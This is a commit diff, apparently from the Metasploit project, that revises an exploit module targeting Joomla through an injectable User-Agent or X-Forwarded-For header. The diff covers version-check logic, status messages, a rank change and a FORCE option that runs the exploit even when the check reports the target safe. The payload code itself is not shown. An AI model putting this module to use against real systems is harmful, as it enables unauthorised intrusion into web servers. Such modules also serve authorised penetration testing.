implement @wchen-r7 's suggestions
parent
b43d580276
commit
76438dfb2f
|
@ -6,7 +6,7 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
@ -51,6 +51,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
|
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
|
||||||
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
|
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
|
||||||
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -80,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
|
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
|
||||||
if rest && rest.include?('ubuntu')
|
if rest && rest.include?('ubuntu')
|
||||||
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
|
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
|
||||||
vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found Ubuntu PHP version #{res.headers['X-Powered-By']}")
|
||||||
|
|
||||||
if version > Gem::Version.new('5.5.9')
|
if version > Gem::Version.new('5.5.9')
|
||||||
vulnerable = false
|
vulnerable = false
|
||||||
|
@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
elsif rest && rest.include?('+deb')
|
elsif rest && rest.include?('+deb')
|
||||||
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
|
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
|
||||||
vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found Debian PHP version #{res.headers['X-Powered-By']}")
|
||||||
|
|
||||||
if version > Gem::Version.new('5.4.45')
|
if version > Gem::Version.new('5.4.45')
|
||||||
vulnerable = false
|
vulnerable = false
|
||||||
|
@ -103,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
vulnerable = true
|
vulnerable = true
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found PHP version #{res.headers['X-Powered-By']}")
|
||||||
vulnerable = true if version <= Gem::Version.new('5.4.44')
|
vulnerable = true if version <= Gem::Version.new('5.4.44')
|
||||||
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
|
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
|
||||||
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
|
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
|
||||||
|
@ -117,8 +122,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
|
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
|
||||||
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
|
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
|
||||||
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
|
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
|
||||||
if joomla_version
|
unless joomla_version.empty?
|
||||||
return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
|
vprint_status("Detected Joomla version #{joomla_version}")
|
||||||
|
return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -131,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
Exploit::CheckCode::Unknown
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_payload
|
def get_payload
|
||||||
|
@ -152,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
if check == Exploit::CheckCode::Safe
|
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
|
||||||
print_error('Target seems safe, so we will not continue.')
|
print_error('Target seems safe, so we will not continue.')
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue